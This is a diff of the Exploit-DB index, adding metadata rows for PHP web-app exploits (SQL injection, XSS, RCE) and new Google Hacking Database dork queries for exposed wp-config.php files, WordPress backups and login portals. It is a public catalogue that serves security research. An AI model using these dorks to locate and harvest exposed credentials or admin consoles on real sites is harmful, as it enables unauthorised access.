 50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",2022-03-16,"Ashish Koli",webapps,php,,2022-03-16,2022-03-16,0,CVE-2022-26965,,,,,
 40566,exploits/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",webapps,php,,2016-10-18,2016-10-18,0,,,,,http://www.exploit-db.compluck-4.7.3.zip,
 38002,exploits/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,webapps,php,80,2015-08-28,2015-08-28,0,OSVDB-126897;OSVDB-126896;OSVDB-126895;OSVDB-126894;OSVDB-126893,,,,http://www.exploit-db.compluck-4.7.3.tar.gz,
 51420,exploits/php/webapps/51420.txt,"pluck v4.7.18 - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 24357,exploits/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",webapps,php,,2004-08-07,2013-01-24,1,OSVDB-8349,,,,,https://www.securityfocus.com/bid/10885/info
 35482,exploits/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Cross-Site Scripting",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46962/info
 26750,exploits/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections",2005-12-06,r0t,webapps,php,,2005-12-06,2013-07-11,1,CVE-2005-4054;OSVDB-21480,,,,,https://www.securityfocus.com/bid/15746/info
@ -29351,7 +29365,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,,2021-04-13,2021-04-13,0,,,,,,
 50740,exploits/php/webapps/50740.txt,"Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,,
 50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",2021-11-15,"Daniel Haro",webapps,php,,2021-11-15,2021-11-15,0,CVE-2021-43140,,,,,
-51273,exploits/php/webapps/51273.txt,"Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-04-06,0,CVE-2022-40032,,,,,
+51273,exploits/php/webapps/51273.txt,"Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-05-05,1,CVE-2022-40032,,,,,
 7444,exploits/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,webapps,php,,2008-12-13,,1,OSVDB-50712;CVE-2008-5763;OSVDB-50711;CVE-2008-5762,,,,,
 50204,exploits/php/webapps/50204.txt,"Simple Water Refilling Station Management System 1.0 - Authentication Bypass",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,,
 50205,exploits/php/webapps/50205.py,"Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,,
@ -31028,6 +31042,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80,2019-04-22,2019-04-22,0,CVE-2019-11398,"Cross-Site Scripting (XSS)",,,,
 48244,exploits/php/webapps/48244.txt,"UliCMS 2020.1 - Persistent Cross-Site Scripting",2020-03-24,SunCSR,webapps,php,,2020-03-24,2020-05-11,0,CVE-2020-12704,,,,,
 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80,2016-02-04,2016-02-04,1,,,,,http://www.exploit-db.comulicms-9.8.1-snowfall-full.zip,
 51434,exploits/php/webapps/51434.txt,"Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 51435,exploits/php/webapps/51435.txt,"Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 11048,exploits/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,webapps,php,,2010-01-06,,1,,,,,,
 11385,exploits/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",webapps,php,,2010-02-09,,1,,,,,,
 34888,exploits/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,webapps,php,,2009-08-19,2016-10-10,1,CVE-2009-3202;OSVDB-57176,,,,,https://www.securityfocus.com/bid/44273/info
@ -32237,6 +32253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15614,exploits/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",webapps,php,,2010-11-25,2010-11-25,1,,,,,http://www.exploit-db.comwolfcms_060b.zip,http://www.htbridge.ch/advisory/xsrf_csrf_in_wolf_cms.html
 18545,exploits/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,webapps,php,,2012-02-29,2012-03-16,0,OSVDB-79703;OSVDB-79702,,,,http://www.exploit-db.comwolfcms_075.zip,https://www.vulnerability-lab.com/get_content.php?id=452
 36818,exploits/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload",2015-04-22,"CWH Underground",webapps,php,80,2015-04-22,2015-04-22,0,OSVDB-120877,,,,http://www.exploit-db.comwolfcms-0.8.2.zip,
 51421,exploits/php/webapps/51421.txt,"Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)",2023-05-05,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 18652,exploits/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",webapps,php,,2012-03-23,2012-03-23,0,OSVDB-80537;OSVDB-80298;CVE-2012-1898;CVE-2012-1897,,,,,http://www.webapp-security.com/2012/03/wolfcms/
 44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,,2018-04-09,2018-04-11,0,CVE-2018-8814,,,,http://www.exploit-db.comwolfcms-0.8.3.1.zip,
 44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80,2018-04-09,2018-04-09,0,CVE-2018-8813,,,,http://www.exploit-db.comwolfcms-0.8.3.1.zip,
--- a/ghdb.xml
+++ b/ghdb.xml
@ -38814,6 +38814,36 @@ misconfigured servers.
  <date>2021-11-08</date>
  <author>Sandesh Ajgekar</author>
 </entry>
 <entry>
  <id>8179</id>
  <link>https://www.exploit-db.com/ghdb/8179</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intext:&quot;index of&quot; inurl:json-rpc</shortDescription>
  <textualDescription># Google Dork: intext:&quot;index of&quot; inurl:json-rpc
 # Files Containing Juicy Info
 # Date:05/05/2023
 # Exploit Author: Praharsh Kumar Singh</textualDescription>
  <query>intext:&quot;index of&quot; inurl:json-rpc</query>
  <querystring>https://www.google.com/search?q=intext:&quot;index of&quot; inurl:json-rpc</querystring>
  <edb></edb>
  <date>2023-05-05</date>
  <author>Praharsh Kumar Singh</author>
 </entry>
 <entry>
  <id>8177</id>
  <link>https://www.exploit-db.com/ghdb/8177</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intext:&quot;index of&quot; inurl:jwks-rsa</shortDescription>
  <textualDescription># Google Dork: intext:&quot;index of&quot; inurl:jwks-rsa
 # Files Containing Juicy Info
 # Date:05/05/2023
 # Exploit Author: Praharsh Kumar Singh</textualDescription>
  <query>intext:&quot;index of&quot; inurl:jwks-rsa</query>
  <querystring>https://www.google.com/search?q=intext:&quot;index of&quot; inurl:jwks-rsa</querystring>
  <edb></edb>
  <date>2023-05-05</date>
  <author>Praharsh Kumar Singh</author>
 </entry>
 <entry>
  <id>8106</id>
  <link>https://www.exploit-db.com/ghdb/8106</link>
@ -40701,6 +40731,21 @@ Information about user data is obtained
  <date>2022-06-20</date>
  <author>Suman Das</author>
 </entry>
 <entry>
  <id>8175</id>
  <link>https://www.exploit-db.com/ghdb/8175</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;index of &quot;phpunit.yml&quot;</shortDescription>
  <textualDescription># Google Dork: intitle:&quot;index of &quot;phpunit.yml&quot;
 # Files Containing Juicy Info
 # Date:05/05/2023
 # Exploit Author: Suman Das</textualDescription>
  <query>intitle:&quot;index of &quot;phpunit.yml&quot;</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;phpunit.yml&quot;</querystring>
  <edb></edb>
  <date>2023-05-05</date>
  <author>Suman Das</author>
 </entry>
 <entry>
  <id>6284</id>
  <link>https://www.exploit-db.com/ghdb/6284</link>
@ -43502,6 +43547,21 @@ the &quot;dovecot.crt.cache&quot; files.
  <date>2020-04-30</date>
  <author>Alexandros Pappas</author>
 </entry>
 <entry>
  <id>8178</id>
  <link>https://www.exploit-db.com/ghdb/8178</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;index of&quot; &quot;download.php?file=&quot;</shortDescription>
  <textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;download.php?file=&quot;
 # Files Containing Juicy Info
 # Date:05/05/2023
 # Exploit Author: Praharsh Kumar Singh</textualDescription>
  <query>intitle:&quot;index of&quot; &quot;download.php?file=&quot;</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;download.php?file=&quot;</querystring>
  <edb></edb>
  <date>2023-05-05</date>
  <author>Praharsh Kumar Singh</author>
 </entry>
 <entry>
  <id>7748</id>
  <link>https://www.exploit-db.com/ghdb/7748</link>
@ -50138,6 +50198,36 @@ used quite often, usually hidden from google with robots.txt. Author: easypwn</t
  <date>2019-12-12</date>
  <author>Aamir Rehman</author>
 </entry>
 <entry>
  <id>8180</id>
  <link>https://www.exploit-db.com/ghdb/8180</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</shortDescription>
  <textualDescription># Google Dork: inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;
 # Files Containing Juicy Info
 # Date:05/05/2023
 # Exploit Author: Andrew Gimenez</textualDescription>
  <query>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</query>
  <querystring>https://www.google.com/search?q=inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</querystring>
  <edb></edb>
  <date>2023-05-05</date>
  <author>Andrew Gimenez</author>
 </entry>
 <entry>
  <id>8181</id>
  <link>https://www.exploit-db.com/ghdb/8181</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</shortDescription>
  <textualDescription># Google Dork: inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php
 # Files Containing Juicy Info
 # Date:05/05/2023
 # Exploit Author: Andrew Gimenez</textualDescription>
  <query>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</query>
  <querystring>https://www.google.com/search?q=inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</querystring>
  <edb></edb>
  <date>2023-05-05</date>
  <author>Andrew Gimenez</author>
 </entry>
 <entry>
  <id>4561</id>
  <link>https://www.exploit-db.com/ghdb/4561</link>
@ -68678,6 +68768,21 @@ Author: Sibi Mathew George
  <date>2023-02-27</date>
  <author>GirlsLearnCyber</author>
 </entry>
 <entry>
  <id>8176</id>
  <link>https://www.exploit-db.com/ghdb/8176</link>
  <category>Pages Containing Login Portals</category>
  <shortDescription>allintitle:&quot;Opengear Management Console&quot;</shortDescription>
  <textualDescription># Google Dork: allintitle:&quot;Opengear Management Console&quot;
 # Pages Containing Login Portals
 # Date:05/05/2023
 # Exploit Author: GirlsLearnCyber</textualDescription>
  <query>allintitle:&quot;Opengear Management Console&quot;</query>
  <querystring>https://www.google.com/search?q=allintitle:&quot;Opengear Management Console&quot;</querystring>
  <edb></edb>
  <date>2023-05-05</date>
  <author>GirlsLearnCyber</author>
 </entry>
 <entry>
  <id>8127</id>
  <link>https://www.exploit-db.com/ghdb/8127</link>